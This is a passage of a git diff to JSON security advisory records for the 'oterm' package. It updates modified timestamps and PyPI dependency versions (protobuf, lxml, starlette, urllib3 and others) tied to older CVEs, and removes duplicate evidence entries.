a/advisories/BREW-oterm-CVE-2021-22570.json +++ b/advisories/BREW-oterm-CVE-2021-22570.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2021-22570", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "PYSEC-2022-48", "CVE-2021-22570", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.15.0", "resource": "protobuf", - "resource_purl": "pkg:pypi/protobuf@6.33.6" + "resource_purl": "pkg:pypi/protobuf@7.36.1" } } ], @@ -46,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "protobuf", - "subject_version": "6.33.6", - "key": "pkg:pypi/protobuf@6.33.6", + "subject_version": "7.36.1", + "key": "pkg:pypi/protobuf@7.36.1", "resource": "protobuf" } ] diff --git a/advisories/BREW-oterm-CVE-2021-27291.json b/advisories/BREW-oterm-CVE-2021-27291.json index 3d1fedc671b..9d011b4013e 100644 --- a/advisories/BREW-oterm-CVE-2021-27291.json +++ b/advisories/BREW-oterm-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2021-27291", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-oterm-CVE-2021-28363.json b/advisories/BREW-oterm-CVE-2021-28363.json index 6275c6076a1..79e74a1e871 100644 --- a/advisories/BREW-oterm-CVE-2021-28363.json +++ b/advisories/BREW-oterm-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2021-28363", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2021-28957.json b/advisories/BREW-oterm-CVE-2021-28957.json index 84c2cdfdf0b..35b17290358 100644 --- a/advisories/BREW-oterm-CVE-2021-28957.json +++ b/advisories/BREW-oterm-CVE-2021-28957.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2021-28957", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-jq4v-f5q6-mjqq", "CVE-2021-28957", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.6.3", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-oterm-CVE-2021-33503.json b/advisories/BREW-oterm-CVE-2021-33503.json index 7381d90bca2..da04f6bf513 100644 --- a/advisories/BREW-oterm-CVE-2021-33503.json +++ b/advisories/BREW-oterm-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2021-33503", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2021-33880.json b/advisories/BREW-oterm-CVE-2021-33880.json index 834104028bc..71ebe445c63 100644 --- a/advisories/BREW-oterm-CVE-2021-33880.json +++ b/advisories/BREW-oterm-CVE-2021-33880.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2021-33880", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-8ch4-58qp-g3mp", "CVE-2021-33880", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "websockets", - "subject_version": "16.1.1", - "key": "pkg:pypi/websockets@16.1.1", - "resource": "websockets" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2021-41945.json b/advisories/BREW-oterm-CVE-2021-41945.json index bf295cb8f31..049ede6eca0 100644 --- a/advisories/BREW-oterm-CVE-2021-41945.json +++ b/advisories/BREW-oterm-CVE-2021-41945.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2021-41945", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:30Z", "upstream": [ "GHSA-h8pj-cxx2-jfg2", "CVE-2021-41945", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "httpx", - "subject_version": "0.28.1", - "key": "pkg:pypi/httpx@0.28.1", - "resource": "httpx" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2021-43818.json b/advisories/BREW-oterm-CVE-2021-43818.json index 9b795f4a961..592b8adebec 100644 --- a/advisories/BREW-oterm-CVE-2021-43818.json +++ b/advisories/BREW-oterm-CVE-2021-43818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2021-43818", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-55x5-fj6c-h6m8", "CVE-2021-43818", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.6.5", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-oterm-CVE-2022-1941.json b/advisories/BREW-oterm-CVE-2022-1941.json index 0d90f859e46..b247fe72297 100644 --- a/advisories/BREW-oterm-CVE-2022-1941.json +++ b/advisories/BREW-oterm-CVE-2022-1941.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2022-1941", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-8gq9-2x98-w8hf", "CVE-2022-1941", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.21.6", "resource": "protobuf", - "resource_purl": "pkg:pypi/protobuf@6.33.6" + "resource_purl": "pkg:pypi/protobuf@7.36.1" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "protobuf", - "subject_version": "6.33.6", - "key": "pkg:pypi/protobuf@6.33.6", - "resource": "protobuf" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "6.33.6", - "key": "pkg:pypi/protobuf@6.33.6", + "subject_version": "7.36.1", + "key": "pkg:pypi/protobuf@7.36.1", "resource": "protobuf" } ] diff --git a/advisories/BREW-oterm-CVE-2022-2309.json b/advisories/BREW-oterm-CVE-2022-2309.json index 1c6bec38c55..f393c86e913 100644 --- a/advisories/BREW-oterm-CVE-2022-2309.json +++ b/advisories/BREW-oterm-CVE-2022-2309.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2022-2309", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-wrxv-2j5q-m38w", "CVE-2022-2309", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.9.1", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-oterm-CVE-2022-29217.json b/advisories/BREW-oterm-CVE-2022-29217.json index 43f01231069..64ae9becf62 100644 --- a/advisories/BREW-oterm-CVE-2022-29217.json +++ b/advisories/BREW-oterm-CVE-2022-29217.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2022-29217", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-ffqj-6fqr-9h24", "CVE-2022-29217", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2022-40896.json b/advisories/BREW-oterm-CVE-2022-40896.json index 90e8832dcd1..1485af81a60 100644 --- a/advisories/BREW-oterm-CVE-2022-40896.json +++ b/advisories/BREW-oterm-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2022-40896", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.15.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-oterm-CVE-2023-26302.json b/advisories/BREW-oterm-CVE-2023-26302.json index da30193b31c..87fe2679929 100644 --- a/advisories/BREW-oterm-CVE-2023-26302.json +++ b/advisories/BREW-oterm-CVE-2023-26302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2023-26302", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-jrwr-5x3p-hvc3", "CVE-2023-26302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2023-26303.json b/advisories/BREW-oterm-CVE-2023-26303.json index a08bf446829..bd0beb365fb 100644 --- a/advisories/BREW-oterm-CVE-2023-26303.json +++ b/advisories/BREW-oterm-CVE-2023-26303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2023-26303", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-vrjv-mxr7-vjf8", "CVE-2023-26303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2023-29159.json b/advisories/BREW-oterm-CVE-2023-29159.json index 7277a50b7d8..e73fd2aa0d2 100644 --- a/advisories/BREW-oterm-CVE-2023-29159.json +++ b/advisories/BREW-oterm-CVE-2023-29159.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2023-29159", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-v5gw-mw7f-84px", "CVE-2023-29159", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.27.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-oterm-CVE-2023-29483.json b/advisories/BREW-oterm-CVE-2023-29483.json index 8b1ce521d29..b01c81aba35 100644 --- a/advisories/BREW-oterm-CVE-2023-29483.json +++ b/advisories/BREW-oterm-CVE-2023-29483.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2023-29483", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:17:35Z", "upstream": [ "GHSA-3rq5-2g8h-59hc", "CVE-2023-29483", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "dnspython", - "subject_version": "2.8.0", - "key": "pkg:pypi/dnspython@2.8.0", - "resource": "dnspython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2023-30798.json b/advisories/BREW-oterm-CVE-2023-30798.json index 7d48d6b0e3a..923a8ac5c45 100644 --- a/advisories/BREW-oterm-CVE-2023-30798.json +++ b/advisories/BREW-oterm-CVE-2023-30798.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2023-30798", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-74m5-2c7w-9w3x", "CVE-2023-30798", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.25.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-oterm-CVE-2023-32681.json b/advisories/BREW-oterm-CVE-2023-32681.json index 17ee9e6e63b..08f162f55f6 100644 --- a/advisories/BREW-oterm-CVE-2023-32681.json +++ b/advisories/BREW-oterm-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2023-32681", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2023-43804.json b/advisories/BREW-oterm-CVE-2023-43804.json index 0a0c9841e3b..f234c762380 100644 --- a/advisories/BREW-oterm-CVE-2023-43804.json +++ b/advisories/BREW-oterm-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2023-43804", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2023-43810.json b/advisories/BREW-oterm-CVE-2023-43810.json index c38017f7d28..a170b2a743e 100644 --- a/advisories/BREW-oterm-CVE-2023-43810.json +++ b/advisories/BREW-oterm-CVE-2023-43810.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2023-43810", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-5rv5-6h4r-h22v", "CVE-2023-43810", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.41b0", "resource": "opentelemetry-instrumentation", - "resource_purl": "pkg:pypi/opentelemetry-instrumentation@0.60b1" + "resource_purl": "pkg:pypi/opentelemetry-instrumentation@0.65b0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "opentelemetry-instrumentation", - "subject_version": "0.60b1", - "key": "pkg:pypi/opentelemetry-instrumentation@0.60b1", - "resource": "opentelemetry-instrumentation" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "opentelemetry-instrumentation", - "subject_version": "0.60b1", - "key": "pkg:pypi/opentelemetry-instrumentation@0.60b1", + "subject_version": "0.65b0", + "key": "pkg:pypi/opentelemetry-instrumentation@0.65b0", "resource": "opentelemetry-instrumentation" } ] diff --git a/advisories/BREW-oterm-CVE-2023-45803.json b/advisories/BREW-oterm-CVE-2023-45803.json index 95703d5c792..69fdc0a92c2 100644 --- a/advisories/BREW-oterm-CVE-2023-45803.json +++ b/advisories/BREW-oterm-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2023-45803", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2024-24762.json b/advisories/BREW-oterm-CVE-2024-24762.json index c875dc7fd99..206071c95c6 100644 --- a/advisories/BREW-oterm-CVE-2024-24762.json +++ b/advisories/BREW-oterm-CVE-2024-24762.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2024-24762", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-2jv5-9r88-3w3p", "CVE-2024-24762", @@ -44,14 +44,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2024-34062.json b/advisories/BREW-oterm-CVE-2024-34062.json index 633d81e9c1b..d5e48c0db99 100644 --- a/advisories/BREW-oterm-CVE-2024-34062.json +++ b/advisories/BREW-oterm-CVE-2024-34062.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2024-34062", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-g7vv-2v7x-gj9p", "CVE-2024-34062", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tqdm", - "subject_version": "4.70.0", - "key": "pkg:pypi/tqdm@4.70.0", - "resource": "tqdm" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2024-35195.json b/advisories/BREW-oterm-CVE-2024-35195.json index df0b35d9b8c..be38be716f8 100644 --- a/advisories/BREW-oterm-CVE-2024-35195.json +++ b/advisories/BREW-oterm-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2024-35195", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2024-3651.json b/advisories/BREW-oterm-CVE-2024-3651.json index 29e3632e7c1..5285528fec9 100644 --- a/advisories/BREW-oterm-CVE-2024-3651.json +++ b/advisories/BREW-oterm-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2024-3651", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.7", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-oterm-CVE-2024-37568.json b/advisories/BREW-oterm-CVE-2024-37568.json index 24dad0ec935..28079425745 100644 --- a/advisories/BREW-oterm-CVE-2024-37568.json +++ b/advisories/BREW-oterm-CVE-2024-37568.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2024-37568", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:17:35Z", "upstream": [ "GHSA-5357-c2jx-v7qh", "CVE-2024-37568", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.3.1", "resource": "authlib", - "resource_purl": "pkg:pypi/authlib@1.7.2" + "resource_purl": "pkg:pypi/authlib@1.8.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", + "subject_version": "1.8.0", + "key": "pkg:pypi/authlib@1.8.0", "resource": "authlib" } ] diff --git a/advisories/BREW-oterm-CVE-2024-37891.json b/advisories/BREW-oterm-CVE-2024-37891.json index 723c78f9a90..fb3f3b1401b 100644 --- a/advisories/BREW-oterm-CVE-2024-37891.json +++ b/advisories/BREW-oterm-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2024-37891", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2024-47081.json b/advisories/BREW-oterm-CVE-2024-47081.json index 90b12a6eb7d..2ab1b2b1d7f 100644 --- a/advisories/BREW-oterm-CVE-2024-47081.json +++ b/advisories/BREW-oterm-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2024-47081", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2024-47874.json b/advisories/BREW-oterm-CVE-2024-47874.json index 775b33df799..c213448ed0f 100644 --- a/advisories/BREW-oterm-CVE-2024-47874.json +++ b/advisories/BREW-oterm-CVE-2024-47874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2024-47874", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-f96h-pmfr-66vw", "CVE-2024-47874", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.40.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-oterm-CVE-2024-53861.json b/advisories/BREW-oterm-CVE-2024-53861.json index bd3b3bf0313..ead80deaf2c 100644 --- a/advisories/BREW-oterm-CVE-2024-53861.json +++ b/advisories/BREW-oterm-CVE-2024-53861.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2024-53861", "published": "2026-08-13T17:24:19Z", - "modified": 